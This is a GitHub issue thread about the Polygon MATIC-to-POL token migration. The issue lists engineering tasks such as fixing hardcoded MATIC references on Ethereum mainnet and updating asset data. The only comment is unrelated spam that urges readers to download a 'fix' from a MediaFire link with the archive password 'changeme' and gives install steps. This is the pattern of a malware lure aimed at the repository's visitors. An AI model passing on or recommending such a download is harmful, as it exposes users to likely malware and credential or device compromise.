### ISSUE TITLE
Polygon Migration MATIC -> POL

### ISSUE THREAD

**Issue by 0xean** [shapeshift/web#7620]
https://polygon.technology/blog/save-the-date-matic-pol-migration-coming-september-4th-everything-you-need-to-know
and 
https://forum.polygon.technology/t/pip-17-polygon-ecosystem-token-pol/12912

My current understanding:
- Nothing changes on Polygon itself (the native gas token is just being renamed from MATIC to POL)
- On eth mainnet, there is migration that will occur from the MATIC erc20 to a new erc20 contract (POL)

AC for this ticket 
- read docs on migration and confirm you understanding of the transition
- fix any places where we have hardcoded MATIC on eth mainnet for any reason 
  - @firebomb1 called out a few potential locations in discord  (base EVM adapter, ramps and also Portals)
- update asset information for native gas token for Polygon 
- Audit codebase for any other potential issues with this migration
- Prepare PR to hopefully be release as close to sep 4 as possible

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
